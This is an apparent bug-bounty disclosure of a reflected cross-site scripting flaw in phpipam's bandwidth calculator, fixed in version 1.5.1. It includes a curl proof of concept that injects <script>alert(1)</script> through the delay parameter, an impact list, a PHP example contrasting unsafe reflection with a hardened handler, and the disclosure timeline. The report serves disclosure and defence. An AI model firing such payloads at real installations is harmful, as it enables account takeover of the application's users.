Cross Site Scripting (XSS) Reflected in phpipam/phpipam

Valid

Reported on

Nov 1st 2022


Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

1. I opened this page: localhost/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator
2. I analysed the code at lines 41-45: https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. Next I used Burp Suite to intercept the request and change the value of some parameters, such as wsize, delay and fsize on lines 13-15 (https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php), to the payload <script>alert(1)</script>
4. The reflected XSS payload <script>alert(1)</script> was triggered.
# PoC
curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
    --data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
    $'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'
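As an added illustration (hypothetical PHP, not phpipam's own code and not the fix shipped in 1.5.1), the reflection pattern behind this report beside a hardened handler: the three calculator inputs are numeric, so the hardened version validates them as positive numbers and HTML-escapes anything it echoes back.

```php
<?php
// Added illustration, not phpipam's code: a hypothetical handler for a
// bandwidth-calculator result page that receives wsize, delay and fsize.

// Vulnerable pattern: raw request values are interpolated straight into HTML,
// so a value such as <script>alert(1)</script> is reflected and executes.
function render_unsafe(array $post): string
{
    return "<td>Window size: {$post['wsize']}</td>"
         . "<td>Delay: {$post['delay']}</td>"
         . "<td>File size: {$post['fsize']}</td>";
}

// Hardened pattern: every field is validated as a positive number before use,
// and anything echoed back is HTML-escaped at the output layer.
function read_positive_number(array $post, string $key): ?float
{
    $raw = $post[$key] ?? null;
    if (!is_string($raw)) {          // missing, or sent as an array (wsize[]=...)
        return null;
    }
    $value = filter_var($raw, FILTER_VALIDATE_FLOAT);
    return ($value === false || $value <= 0) ? null : $value;
}

function render_safe(array $post): string
{
    $fields = ['wsize' => 'Window size', 'delay' => 'Delay', 'fsize' => 'File size'];
    $cells = [];
    foreach ($fields as $key => $label) {
        $value = read_positive_number($post, $key);
        if ($value === null) {
            // Reject the request instead of reflecting the offending value.
            http_response_code(400);
            return '<p class="error">Invalid value for '
                 . htmlspecialchars($key, ENT_QUOTES, 'UTF-8') . '</p>';
        }
        $cells[] = '<td>' . htmlspecialchars($label, ENT_QUOTES, 'UTF-8') . ': '
                 . htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8') . '</td>';
    }
    return implode('', $cells);
}

// Constructed sample input mirroring the request body in the report.
$sample = ['wsize' => '50000', 'delay' => '<script>alert(1)</script>', 'fsize' => '1024'];
echo render_unsafe($sample), PHP_EOL; // payload comes back verbatim
echo render_safe($sample), PHP_EOL;   // 400 and an error line, nothing reflected
```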

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

  • Perform any action within the application that the user can perform.
  • View any information that the user is able to view.
  • Modify any information that the user is able to modify.
  • Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
We are processing your report and will contact the phpipam team within 24 hours. a year ago
ZenalArifin modified the report
a year ago
ZenalArifin modified the report
a year ago
We have contacted a member of the phpipam team and are waiting to hear back a year ago
We have sent a follow up to the phpipam team. We will try again in 4 days. a year ago
We have sent a second follow up to the phpipam team. We will try again in 7 days. a year ago
We have sent a third follow up to the phpipam team. We will try again in 14 days. a year ago
garyallan validated this vulnerability a year ago

Thanks for reporting

z3n70 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in 1.5.1 with commit 94ec73 a year ago
garyallan has been awarded the fix bounty
ZenalArifin
a year ago

Researcher


thanks @garyallan for my first CVE <3

ZenalArifin
a year ago

Researcher


Hello @garyallan, any update?

ZenalArifin
a year ago

Researcher


Hello. The CVE for this vulnerability has not been published. When will you publish it?

This vulnerability has now been published a year ago